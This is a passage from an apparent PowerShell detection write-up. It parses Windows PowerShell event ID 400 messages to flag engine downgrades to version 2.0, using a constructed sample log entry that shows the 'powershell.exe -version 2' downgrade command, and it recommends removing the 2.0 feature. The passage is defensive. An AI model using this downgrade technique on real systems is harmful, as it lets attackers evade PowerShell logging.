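        if ($image -and $image -notmatch '^(powershell|powershell_ise|pwsh)(\.exe)?$') {
            $flags += "engine hosted by $image rather than powershell.exe"
        }
        [pscustomobject]@{
            EngineVersion   = $engine
            HostName        = $hostName
            HostApplication = $app
            Flags           = $flags
        }
    }
}

# Constructed sample messages (EID 400 layout): a normal console start and the Test #12 downgrade.
$normal = @'
Engine state is changed from None to Available.

Details:
    NewEngineState=Available
    PreviousEngineState=None
    SequenceNumber=13
    HostName=ConsoleHost
    HostVersion=5.1.19041.1
    HostApplication=powershell.exe
    EngineVersion=5.1.19041.1
'@
$downgrade = @'
Engine state is changed from None to Available.

Details:
    NewEngineState=Available
    PreviousEngineState=None
    SequenceNumber=13
    HostName=ConsoleHost
    HostVersion=2.0
    HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -version 2 -Command Write-Host $PSVersion
    EngineVersion=2.0
'@
$normal, $downgrade | Get-PSEngineStart | Format-Table EngineVersion, HostName, Flags
# The second row carries the 'downgrade: engine 2.0 ...' flag; the first has none.

# Live: same triage over the real log, keeping only events that raised a flag.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object { Get-PSEngineStart -Message $_.Message } |
    Where-Object { $_.Flags }
```

Because the 2.0 engine writes nothing to the newer Microsoft-Windows-PowerShell/Operational log, EID 400 in the classic log is the place a downgrade still shows up; the durable fix is removing the PowerShell 2.0 optional feature (the prerequisite Test #12 has to install) so the downgrade has nothing to fall back to.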